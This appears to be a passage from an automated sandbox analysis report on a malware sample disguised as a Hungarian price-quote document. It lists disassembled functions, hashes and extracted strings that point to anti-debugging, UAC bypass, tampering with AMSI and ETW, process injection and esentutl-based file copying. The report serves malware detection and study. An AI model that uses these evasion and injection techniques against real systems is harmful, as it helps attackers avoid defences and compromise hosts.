                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Path$DeleteFileNameName_
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4284456518-0
                                                                                                                                                  • Opcode ID: 614f3707581093408c4c59f015ced92853e419913fcea856d41d070ae9322b44
                                                                                                                                                  • Instruction ID: ea2c7312e6eff16b858ea3021c51a6377c7d9d1b5222e124d48ef7e5097627db
                                                                                                                                                  • Opcode Fuzzy Hash: 614f3707581093408c4c59f015ced92853e419913fcea856d41d070ae9322b44
                                                                                                                                                  • Instruction Fuzzy Hash: 1301627594430D6EEB06DBA08E41FCD77B9AF85704F5144929200E6081DBB5AB048B74
                                                                                                                                                  Function 029BDC04 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029A4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 029A4F2E
                                                                                                                                                  • RtlI.N(?,?,00000000,029BDC7E), ref: 029BDC2C
                                                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,029BDC7E), ref: 029BDC42
                                                                                                                                                  • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,029BDC7E), ref: 029BDC61
                                                                                                                                                    • Part of subcall function 029A4C60: SysFreeString.OLEAUT32(029BF4A4), ref: 029A4C6E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1530111750-0
                                                                                                                                                  • Opcode ID: 172c2440ee2b7cd4d142ec34d3847a3c52e9b137f1c4e10f3d2536ff04da29a1
                                                                                                                                                  • Instruction ID: d5c2b215bc9b5f9ac744c012ed5b3c37627ebb91a05153ab38a0822248883f14
                                                                                                                                                  • Opcode Fuzzy Hash: 172c2440ee2b7cd4d142ec34d3847a3c52e9b137f1c4e10f3d2536ff04da29a1
                                                                                                                                                  • Instruction Fuzzy Hash: A301F47594020CBEEB11EBA0DE52FDDB3BDEF88700F5144B5E601E6580EBB56B048A74
                                                                                                                                                  Function 029B6DC8 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B6D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,029B6DB9,?,?,?,00000000), ref: 029B6D99
                                                                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,029B6EAC,00000000,00000000,029B6E2B,?,00000000,029B6E9B), ref: 029B6E17
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFromInstanceProg
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2151042543-0
                                                                                                                                                  • Opcode ID: 05ca8fcbb739c14378c54a30642bb0ec9203736aab8d91503c0a66b1c023fb93
                                                                                                                                                  • Instruction ID: 7ba31a287d74f476082f076c1a43075c14e90d9a535ac27cc55966072a154506
                                                                                                                                                  • Opcode Fuzzy Hash: 05ca8fcbb739c14378c54a30642bb0ec9203736aab8d91503c0a66b1c023fb93
                                                                                                                                                  • Instruction Fuzzy Hash: 9F012B35608704AEF712EF61DD228AF7BFDEFC9B00F510835F405D2680E630A910CA60
                                                                                                                                                  Function 029BAD98 Relevance: 1.5, APIs: 1, Instructions: 17processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029BAB1C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,029BADA3,?,?,029BAE35,00000000,029BAF11), ref: 029BAB30
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 029BAB48
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 029BAB5A
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 029BAB6C
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 029BAB7E
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 029BAB90
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 029BABA2
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 029BABB4
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 029BABC6
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 029BABD8
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 029BABEA
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 029BABFC
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 029BAC0E
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 029BAC20
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 029BAC32
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 029BAC44
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 029BAC56
                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,029BAE35,00000000,029BAF11), ref: 029BADA9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2242398760-0
                                                                                                                                                  • Opcode ID: 3afef715b5bb5aaeeae8c1828f2d0459d9b8eb034400fd8e4a150862f63acc89
                                                                                                                                                  • Instruction ID: fdc2c96060f3dc00b29db035e058b68f5dbba70be0df2b451c321d70e2829b74
                                                                                                                                                  • Opcode Fuzzy Hash: 3afef715b5bb5aaeeae8c1828f2d0459d9b8eb034400fd8e4a150862f63acc89
                                                                                                                                                  • Instruction Fuzzy Hash: A0C08CA3712230178A3066F92D889D3978DCD8A2B730408A2F909E3102DB298C1292E0
                                                                                                                                                  Function 029BF7C8 Relevance: 227.8, APIs: 8, Strings: 117, Instructions: 9071COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • InetIsOffline.URL(00000000,00000000,029CB784,?,?,?,00000000,00000000), ref: 029BF801
                                                                                                                                                    • Part of subcall function 029B89D0: FreeLibrary.KERNEL32(74B20000,00000000,00000000,00000000,00000000,02A2738C,Function_0000662C,00000004,02A2739C,02A2738C,05F5E103,00000040,02A273A0,74B20000,00000000,00000000), ref: 029B8AAA
                                                                                                                                                    • Part of subcall function 029BF6E8: GetModuleHandleW.KERNEL32(KernelBase,?,029BFAEB,UacInitialize,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,ScanBuffer,02A27380,029CB7B8,ScanString,02A27380,029CB7B8,Initialize), ref: 029BF6EE
                                                                                                                                                    • Part of subcall function 029BF6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 029BF700
                                                                                                                                                    • Part of subcall function 029BF744: GetModuleHandleW.KERNEL32(KernelBase), ref: 029BF754
                                                                                                                                                    • Part of subcall function 029BF744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 029BF766
                                                                                                                                                    • Part of subcall function 029BF744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 029BF77D
                                                                                                                                                    • Part of subcall function 029A7E5C: GetFileAttributesA.KERNEL32(00000000,?,029C041F,ScanString,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,ScanString,02A27380,029CB7B8,UacScan,02A27380,029CB7B8,UacInitialize), ref: 029A7E67
                                                                                                                                                    • Part of subcall function 029AC364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B1B8B8,?,029C0751,ScanBuffer,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,ScanBuffer,02A27380,029CB7B8,OpenSession), ref: 029AC37B
                                                                                                                                                    • Part of subcall function 029BDD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,029BDE40), ref: 029BDDAB
                                                                                                                                                    • Part of subcall function 029BDD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,029BDE40), ref: 029BDDDB
                                                                                                                                                    • Part of subcall function 029BDD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 029BDDF0
                                                                                                                                                    • Part of subcall function 029BDD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 029BDE1C
                                                                                                                                                    • Part of subcall function 029BDD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 029BDE25
                                                                                                                                                    • Part of subcall function 029A7E80: GetFileAttributesA.KERNEL32(00000000,?,029C356F,ScanString,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,ScanBuffer,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,Initialize), ref: 029A7E8B
                                                                                                                                                    • Part of subcall function 029A8048: CreateDirectoryA.KERNEL32(00000000,00000000,?,029C370D,OpenSession,02A27380,029CB7B8,ScanString,02A27380,029CB7B8,Initialize,02A27380,029CB7B8,ScanString,02A27380,029CB7B8), ref: 029A8055
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                                                                                                                  • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                                                  • API String ID: 297057983-2644593349
                                                                                                                                                  • Opcode ID: 471510e126fde099da60994214ecbb01c6c2fed6545ce9c9807e0bb45836d915
                                                                                                                                                  • Instruction ID: 61fe7e75a3c7411ba952f3574679ebefcfdb7aafef796e3387350920b70da0ed
                                                                                                                                                  • Opcode Fuzzy Hash: 471510e126fde099da60994214ecbb01c6c2fed6545ce9c9807e0bb45836d915
                                                                                                                                                  • Instruction Fuzzy Hash: 5B142234A0025C8FDB11EB68DCA1ADE73BAFFC9704F6050F994099B654DB70AE568F81
                                                                                                                                                  Function 029C8128 Relevance: 162.0, APIs: 5, Strings: 86, Instructions: 2778processthreadCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 4573 29c8128-29c8517 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a48ec 4688 29c851d-29c86f0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a47ec call 29a49a0 call 29a4d74 call 29a4df0 CreateProcessAsUserW 4573->4688 4689 29c93a1-29c9524 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a48ec 4573->4689 4798 29c876e-29c8879 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 4688->4798 4799 29c86f2-29c8769 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 4688->4799 4779 29c952a-29c9539 call 29a48ec 4689->4779 4780 29c9cf5-29cb2fa call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 * 16 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29b7c10 call 29b8338 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 ExitProcess 4689->4780 4779->4780 4787 29c953f-29c9812 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29bf094 call 29a4860 call 29a49a0 call 29a46d4 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a7e5c 4779->4787 5045 29c9aef-29c9cf0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a49f8 call 29b8d70 4787->5045 5046 29c9818-29c9aea call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29be358 call 29a4530 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4de0 * 2 call 29a4764 call 29bdc8c 4787->5046 4899 29c887b-29c887e 4798->4899 4900 29c8880-29c8ba0 call 29a49f8 call 29bde50 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29bd164 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 4798->4900 4799->4798 4899->4900 5216 29c8bb9-29c939c call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 ResumeThread call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 CloseHandle call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29b8080 call 29b894c * 6 CloseHandle call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 4900->5216 5217 29c8ba2-29c8bb4 call 29b8730 4900->5217 5045->4780 5046->5045 5216->4689 5217->5216
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B89D0: FreeLibrary.KERNEL32(74B20000,00000000,00000000,00000000,00000000,02A2738C,Function_0000662C,00000004,02A2739C,02A2738C,05F5E103,00000040,02A273A0,74B20000,00000000,00000000), ref: 029B8AAA
                                                                                                                                                  • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02B1B7E0,02B1B824,OpenSession,02A27380,029CB7B8,UacScan,02A27380), ref: 029C86E9
                                                                                                                                                  • ResumeThread.KERNEL32(00000000,ScanBuffer,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,UacScan,02A27380,029CB7B8,ScanBuffer,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8), ref: 029C8D33
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,ScanBuffer,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,UacScan,02A27380,029CB7B8,00000000,ScanBuffer,02A27380,029CB7B8,OpenSession,02A27380), ref: 029C8EB2
